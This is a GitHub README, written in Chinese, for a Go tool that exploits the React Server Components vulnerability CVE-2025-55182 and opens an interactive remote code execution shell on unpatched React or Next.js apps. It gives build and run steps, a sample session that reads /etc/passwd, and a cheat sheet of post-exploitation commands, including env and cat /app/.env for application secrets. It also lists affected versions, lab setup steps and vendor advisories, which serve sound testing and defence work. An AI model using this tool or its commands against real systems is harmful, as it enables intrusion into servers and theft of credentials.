hexsh1dow/CVE-2025-55182

GitHub: hexsh1dow/CVE-2025-55182

这是一个针对 React Server Components 严重漏洞 CVE-2025-55182 的 Go 语言利用工具,能为受影响的 React 或 Next.js 应用提供交互式远程代码执行 Shell。

Stars: 3 | Forks: 0

# 👻 CVE-2025-55182 Go 利用工具 ## 🎯 这是什么? **CVE-2025-55182** 是一个极简的、交互式 RCE 利用工具,针对 **CVE-2025-55182**,这是 React Server Components (RSC) 中的一个严重漏洞,影响 React 19.0.0 - 19.2.0 和 Next.js 应用程序。 ## 📦 安装 ### 前置条件 - Go 1.18 或更高版本 - 运行 React 19.0.0 - 19.2.0 的易受攻击目标 ### 从源码构建 ``` git clone https://github.com/hexsh1dow/CVE-2025-55182.git cd CVE-2025-55182 go build -o CVE-2025-55182 main.go ``` ## 🚀 使用方法 ### 基本用法 ``` ./CVE-2025-55182 ``` ### 交互式会话 ``` _____________ _______________ _______________ ________ .________ .________.____________ ______ ________ ╲_ ___ ╲ ╲ ╱ ╱╲_ _____╱ ╲_____ ╲ _ ╲ ╲_____ ╲ │ ____╱ │ ____╱│ ____╱_ │╱ __ ╲ ╲_____ ╲ ╱ ╲ ╲╱╲ Y ╱ │ __)_ ______ ╱ ____╱ ╱_╲ ╲ ╱ ____╱ │____ ╲ ______ │____ ╲ │____ ╲ │ │> < ╱ ____╱ ╲ ╲____╲ ╱ │ ╲ ╱_____╱ ╱ ╲ ╲_╱ ╲╱ ╲ ╱ ╲ ╱_____╱ ╱ ╲╱ ╲│ ╱ ── ╲╱ ╲ ╲______ ╱ ╲___╱ ╱_______ ╱ ╲_______ ╲_____ ╱╲_______ ╲╱______ ╱ ╱______ ╱______ ╱│___╲______ ╱╲_______ ╲ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ React2Shell RCE | CVE-2025-55182 @hexsh1dow ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ [?] Target: localhost:3000 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ [+] VULNERABLE ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ghost@rce $ id uid=1000(node) gid=1000(node) groups=1000(node) ghost@rce $ whoami node ghost@rce $ pwd /app ghost@rce $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash node:x:1000:1000::/home/node:/bin/bash ghost@rce $ exit ``` **受影响版本:** - React 19.0.0, 19.1.0, 19.1.1, 19.2.0 - 使用这些 React 版本的 Next.js 应用程序 **已修复版本:** - React 19.2.1+ - 更新了 React 依赖的 Next.js ## 🧪 测试实验室搭建 想要安全地进行测试?搭建一个易受攻击的实验室环境: ``` # 克隆易受攻击的 Next.js 应用 git clone https://github.com/zack0x01/vuln-app-CVE-2025-55182.git cd vuln-app-CVE-2025-55182 # 安装并运行 npm install --legacy-peer-deps npm run dev # 在另一个终端中,运行 ghost-scanner ./CVE-2025-55182 # 输入:localhost:3000 ``` ## 📚 常用命令 ``` ghost@rce $ id # Check user privileges ghost@rce $ whoami # Current username ghost@rce $ pwd # Current directory ghost@rce $ ls -la # List files ghost@rce $ cat /etc/passwd # Read files ghost@rce $ uname -a # System information ghost@rce $ env # Environment variables ghost@rce $ ps aux # Running processes ghost@rce $ netstat -tulpn # Network connections ghost@rce $ cat /app/.env # Application secrets ``` ## 🔗 参考资料 - [CVE-2025-55182 详情](https://cloud.projectdiscovery.io/library/CVE-2025-55182) - [React 安全公告](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components) - [Next.js 安全公告](https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp) - [maple3142 的原始 PoC](https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3) - [Assetnote 研究](https://github.com/assetnote/react2shell-scanner) - [易受攻击的测试应用](https://github.com/zack0x01/vuln-app-CVE-2025-55182) ## 📝 许可证 本项目采用 MIT 许可证授权 - 详见 [LICENSE](LICENSE) 文件。
**由 hexsh1dow 用 👻 制作** **Happy hacking ⚡**
标签:CISA项目, CVE-2025-55182, EVTX分析, EXP, Go语言, RCE, React, React 19, React Server Components, RSC, Syscalls, Web安全, 交互式工具, 日志审计, 程序破解, 编程工具, 网络安全, 蓝队分析, 远程代码执行, 隐私保护